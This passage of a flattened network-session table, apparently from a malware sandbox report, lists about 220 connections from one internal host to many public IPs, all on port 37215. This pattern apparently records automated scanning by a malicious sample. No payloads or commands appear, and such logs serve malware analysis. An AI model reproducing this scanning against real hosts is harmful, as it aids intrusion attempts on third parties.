                                              9659192.168.2.1553524190.112.52.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9660192.168.2.1558804190.200.95.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9661192.168.2.154399841.215.41.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9662192.168.2.154092841.160.188.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9663192.168.2.155488237.55.37.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9664192.168.2.153572831.176.59.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9665192.168.2.155094877.17.64.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9666192.168.2.1547064157.244.8.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9667192.168.2.1538592190.212.64.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9668192.168.2.154283231.27.197.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9669192.168.2.153429841.81.79.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9670192.168.2.1539684222.194.190.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9671192.168.2.154060431.86.208.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9672192.168.2.1536832190.246.128.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9673192.168.2.153922241.90.26.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9674192.168.2.1534506197.190.102.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9675192.168.2.1539460122.7.128.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9676192.168.2.1560034121.206.108.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9677192.168.2.1560514222.207.2.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9678192.168.2.153319245.168.113.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9679192.168.2.1543312200.80.122.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9680192.168.2.154006094.33.234.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9681192.168.2.1558118122.169.147.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9682192.168.2.1552848138.135.137.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9683192.168.2.1534056197.22.85.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9684192.168.2.153475641.235.50.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9685192.168.2.1554996197.16.60.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9686192.168.2.1549980156.30.57.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9687192.168.2.1560114190.247.36.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9688192.168.2.154029641.22.80.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9689192.168.2.1553740186.233.186.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9690192.168.2.1558002156.162.117.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9691192.168.2.1535902138.28.168.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9692192.168.2.1539256102.86.22.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9693192.168.2.1549700156.48.159.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9694192.168.2.1555992121.253.123.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9695192.168.2.1558940121.46.134.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9696192.168.2.1540580122.94.140.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9697192.168.2.155508694.95.155.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9698192.168.2.1543864121.252.81.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9699192.168.2.1547532156.27.6.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9700192.168.2.154542431.96.250.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9701192.168.2.1560420122.211.113.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9702192.168.2.1542614181.127.201.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9703192.168.2.1556862156.29.178.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9704192.168.2.1555962181.179.98.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9705192.168.2.1544760190.202.255.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9706192.168.2.1541392197.30.150.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9707192.168.2.1554312102.221.180.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9708192.168.2.1554876156.151.196.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9709192.168.2.154050294.238.247.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9710192.168.2.154075841.106.140.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9711192.168.2.155488231.221.3.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9712192.168.2.153872237.31.160.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9713192.168.2.1545356222.222.75.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9714192.168.2.1535132157.69.116.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9715192.168.2.1544852156.100.148.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9716192.168.2.1547332121.120.39.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9717192.168.2.1558814181.86.194.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9718192.168.2.1541348157.23.79.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9719192.168.2.155188094.122.115.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9720192.168.2.1539620190.126.65.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9721192.168.2.1541510222.77.63.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9722192.168.2.1534894157.252.189.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9723192.168.2.1556252181.49.78.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9724192.168.2.1541976157.26.162.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9725192.168.2.1547166121.121.45.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9726192.168.2.1560072181.171.227.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9727192.168.2.1559944138.234.211.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9728192.168.2.1554808157.183.44.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9729192.168.2.1552088102.133.192.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9730192.168.2.1540518186.177.234.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9731192.168.2.154093441.152.0.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9732192.168.2.155953841.209.112.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9733192.168.2.1537040222.96.245.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9734192.168.2.1542922121.161.42.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9735192.168.2.1552112186.184.53.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9736192.168.2.1537020157.199.45.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9737192.168.2.1533186138.106.32.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9738192.168.2.1540924138.228.175.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9739192.168.2.1537496122.116.11.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9740192.168.2.1536364181.34.111.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9741192.168.2.1540038122.128.140.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9742192.168.2.153430637.103.180.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9743192.168.2.155969494.77.3.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9744192.168.2.1560766197.165.59.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9745192.168.2.1555520122.56.34.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9746192.168.2.153603231.79.28.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9747192.168.2.1546384190.32.179.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9748192.168.2.153493437.27.134.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9749192.168.2.1550300138.150.224.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9750192.168.2.1554650197.171.160.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9751192.168.2.1552696197.243.92.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9752192.168.2.155924294.2.126.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9753192.168.2.1560474102.159.134.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9754192.168.2.1555296222.56.132.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9755192.168.2.155459694.200.125.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9756192.168.2.1537280156.68.68.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9757192.168.2.1539484121.148.86.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9758192.168.2.1559544122.11.141.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9759192.168.2.1559722181.195.26.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9760192.168.2.1535168186.14.204.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9761192.168.2.1540874157.31.100.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9762192.168.2.1557360156.164.66.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9763192.168.2.1558506181.226.247.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9764192.168.2.1536954197.128.23.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9765192.168.2.1558356156.186.255.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9766192.168.2.154392837.87.237.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9767192.168.2.154542294.40.52.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9768192.168.2.154952041.246.100.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9769192.168.2.1540824102.203.225.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9770192.168.2.1538362181.254.225.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9771192.168.2.153477645.8.246.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9772192.168.2.1557630197.195.157.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9773192.168.2.1547970156.138.107.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9774192.168.2.155470841.136.218.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9775192.168.2.1546918122.180.92.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9776192.168.2.153956694.104.87.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9777192.168.2.1556298181.181.75.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9778192.168.2.154467294.38.219.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9779192.168.2.153625645.45.11.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9780192.168.2.1555414122.154.150.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9781192.168.2.1541584157.102.118.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9782192.168.2.1556744181.4.197.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9783192.168.2.154934894.78.236.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9784192.168.2.1557450157.116.188.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9785192.168.2.1546218138.151.6.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9786192.168.2.1540876181.170.213.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9787192.168.2.155995841.119.123.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9788192.168.2.1535884222.10.224.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9789192.168.2.154485257.95.69.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9790192.168.2.154948494.222.236.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9791192.168.2.155161831.228.243.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9792192.168.2.1549910122.163.254.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9793192.168.2.153513845.82.170.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9794192.168.2.154340231.41.190.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9795192.168.2.153685437.142.31.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9796192.168.2.1539582197.248.27.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9797192.168.2.1550450102.196.236.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9798192.168.2.154398494.237.174.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9799192.168.2.155228637.96.129.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9800192.168.2.1560598102.206.108.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9801192.168.2.1533310122.81.226.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9802192.168.2.1555942122.242.128.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9803192.168.2.1544606157.21.173.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9804192.168.2.1533136181.10.179.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9805192.168.2.154581837.227.242.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9806192.168.2.155789237.129.238.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9807192.168.2.1543360190.170.31.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9808192.168.2.1533558138.159.145.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9809192.168.2.1557146222.112.137.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9810192.168.2.1555784138.169.248.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9811192.168.2.154528245.199.13.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9812192.168.2.1560482197.244.94.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9813192.168.2.155395294.64.242.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9814192.168.2.1542308138.1.200.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9815192.168.2.1549440222.22.4.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9816192.168.2.1534060181.106.29.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9817192.168.2.1541846102.115.140.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9818192.168.2.1557530121.136.109.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9819192.168.2.1551008181.1.94.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9820192.168.2.1546558157.94.183.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9821192.168.2.1554690181.217.231.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9822192.168.2.153638441.24.172.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9823192.168.2.1548676121.244.160.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9824192.168.2.155165294.40.7.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9825192.168.2.1533888156.247.81.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9826192.168.2.1536610197.224.22.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9827192.168.2.1546420102.119.99.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9828192.168.2.1533418138.164.253.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9829192.168.2.1534090181.242.120.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9830192.168.2.154482845.234.81.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9831192.168.2.1560790138.60.83.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9832192.168.2.156017841.130.11.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9833192.168.2.1551022102.52.216.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9834192.168.2.1541352102.45.116.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9835192.168.2.1535104122.23.200.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9836192.168.2.1532886197.177.111.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9837192.168.2.1551262138.233.213.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9838192.168.2.1560712102.223.255.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9839192.168.2.1540430186.117.122.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9840192.168.2.154539294.54.179.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9841192.168.2.1539022122.233.149.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9842192.168.2.1536646190.199.221.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9843192.168.2.1536874181.242.72.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9844192.168.2.155134641.252.70.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9845192.168.2.1550186186.64.208.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9846192.168.2.1533894103.98.170.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9847192.168.2.154210441.204.216.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9848192.168.2.155264241.7.160.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9849192.168.2.1555374122.109.10.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9850192.168.2.1546770197.63.218.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9851192.168.2.153377837.18.164.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9852192.168.2.1545368122.210.77.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9853192.168.2.1551594121.94.245.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9854192.168.2.1553754197.154.46.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9855192.168.2.1534378129.159.4.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9856192.168.2.154615094.241.44.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9857192.168.2.1557824138.78.133.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9858192.168.2.1558920186.38.185.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9859192.168.2.1541446157.95.254.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9860192.168.2.1556164138.177.66.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9861192.168.2.1557546138.74.164.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9862192.168.2.1555898102.17.4.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9863192.168.2.1539082157.231.43.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9864192.168.2.1533126122.69.250.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9865192.168.2.155010237.227.112.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9866192.168.2.1559128186.0.67.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9867192.168.2.155916241.173.155.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9868192.168.2.154330494.120.37.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9869192.168.2.153880094.143.110.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9870192.168.2.1559774121.54.11.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9871192.168.2.1559134186.147.171.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9872192.168.2.1535548197.180.149.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9873192.168.2.1560032222.15.177.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9874192.168.2.1548606138.133.165.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9875192.168.2.1560080181.38.251.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9876192.168.2.1551798186.179.93.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9877192.168.2.1541764181.184.140.6337215
